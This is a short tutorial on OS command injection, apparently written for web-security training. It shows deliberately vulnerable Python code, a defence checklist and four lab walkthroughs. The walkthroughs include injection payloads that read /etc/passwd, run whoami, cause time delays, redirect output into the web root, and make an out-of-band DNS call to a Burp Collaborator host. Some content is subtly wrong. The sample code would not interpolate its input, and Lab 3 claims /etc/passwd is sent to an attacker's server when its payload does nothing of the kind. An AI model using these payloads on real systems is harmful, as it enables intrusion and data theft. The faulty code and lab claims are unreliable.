OS Command

OS Command Injection is a vulnerability that allows attackers to execute arbitrary operating system commands on the server hosting an application. This occurs when an application passes user input directly to a system shell without proper validation or sanitization.

Example Exploit

Vulnerable Code

python

import os
domain = user_input # User-supplied input
os.system(f”ping -c 4 (domain)”)

Attack Payload

google.com; cat /etc/passwd

The application executes:

bash

ping -c 4 google.com; cat /etc/passwd

The /etc/passwd file is displayed, exposing sensitive system information.

Vulnerability Details

Common Locations

Input fields that interact with system commands (e.g., ping, traceroute).File upload/download functionality.Administrative interfaces (e.g., server management tools).

Root Causes

Unsanitized Input: Failure to validate or sanitize user-supplied input.Use of Dangerous Functions: Functions like os.system(), exec(), or popen() that execute shell commands.Lack of Input Validation: Allowing special characters (e.g., ;, &, !).

Impact

Remote Code Execution: Full control over the server.Data Theft: Access to sensitive files (e.g., /etc/passwd, database credentials).System Compromise: Installation of malware or backdoors.

Prevention Strategies

Avoid Dangerous Functions:
a. Use safer alternatives (e.g., subprocess.run() in Python with shell=False).Input Validation:
a. Whitelist allowed characters (e.g., alphanumerics).
b. Reject input containing special characters (e.g., ;, &, !).Sandboxing:
a. Run the application in a restricted environment (e.g., a Docker container).Least Privilege:
a. Run the application with minimal permissions.Web Application Firewall (WAF):
a. Block malicious payloads.

Lab 1: OS command injection, simple case

Intercept the request with Burp Suite.Modify the storeID parameter, giving it the value 1 | whoami.Result: The server executes whoami, revealing the current user.

Lab 2: Blind OS command injection with time delays

Modify the email parameter, changing it to:
email=x|ping+c+10+127.0.0.1|Result: The server response is delayed by 10 seconds, confirming the vulnerability.

Lab 3: Blind OS command injection with output redirection

Objective: Exfiltrate the /etc/passwd file.
Steps:

Modify the email parameter, changing it to:
email=||whoami>/var/www/images/output.txt|Result: The /etc/passwd file is sent to the attacker’s server.

Lab 4: Blind OS command injection with out-of-band interaction

Use Burp Suite to intercept and modify the request that submits feedback.Modify the email parameter, changing it to:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||Right-click and select “Insert Collaborator payload” to insert a Burp.
Collaborator subdomain where indicated in the modified email
parameter.